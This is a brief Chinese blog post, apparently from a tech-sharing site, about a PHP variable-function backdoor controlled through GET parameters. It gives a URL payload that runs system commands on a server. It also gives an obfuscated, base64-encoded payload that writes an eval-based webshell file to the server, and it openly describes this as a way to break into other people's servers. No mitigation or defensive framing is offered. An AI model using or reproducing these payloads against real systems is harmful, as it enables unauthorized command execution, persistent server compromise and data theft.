一个非常简单的php可变函数后门

这是一个非常简单的php可变函数,用get方法传参就能构成后门


如在URL中输入下面代码,这个可变函数就相当于system(ipconfig),就能在网页上显示对方服务器的ip、网关等信息。

?a=system&b=ipconfig

如果用get方法输入下面的一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但同样会生成木马,成功达到入侵对方服务器的目的,真可谓不容小觑!

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

你可能感兴趣的:(网络安全,Linux,开发语言,php,开发语言)